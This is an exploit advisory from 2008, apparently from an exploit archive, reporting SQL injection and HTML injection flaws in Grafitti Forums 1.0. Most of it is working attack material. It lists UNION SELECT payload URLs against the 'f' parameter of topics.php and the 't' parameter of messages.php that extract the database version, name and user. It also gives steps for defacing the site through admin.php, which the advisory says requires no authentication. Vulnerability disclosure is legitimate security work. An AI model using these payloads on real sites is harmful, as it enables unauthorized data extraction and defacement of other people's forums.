Grafitti Forums 1.0 Remote SQL Injection-HTML Injection Vulnerabilities

2008-09-11 17:01:07

############################################################################################################
[+] Grafitti Forums v1.0 Remote SQL Injection/HTML Injection
[+] Discovered By SirGod
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke
############################################################################################################

[+] Remote SQL Injection Vulnerabilities


PoC :

http://[target]/[path]/topics.php?f=[SQL]

Example :

http://127.0.0.1/topics.php?f=-1 union all select version()--
http://127.0.0.1/topics.php?f=-1 union ll select database()--
http://127.0.0.1/topics.php?f=-1 union all select user()--

PoC :

http://[target]/[path]/messages.php?t=[SQL]

Example :

http://127.0.0.1/messages.php?t=-1 union all select version()--
http://127.0.0.1/messages.php?t=-1 union ll select database()--
http://127.0.0.1/messages.php?t=-1 union all select user()--


[+] HTML Injection

1. Just go to :

http://[target]/[path]/admin.php

2. No Authentication Required !

3. Click Add Forum .

4. Complete the forum name : Owned etc.. 50 chars maximum. (also you can use HTML Code) .

5. Complete the forum description with any HTML Code (100 chars max) .

############################################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.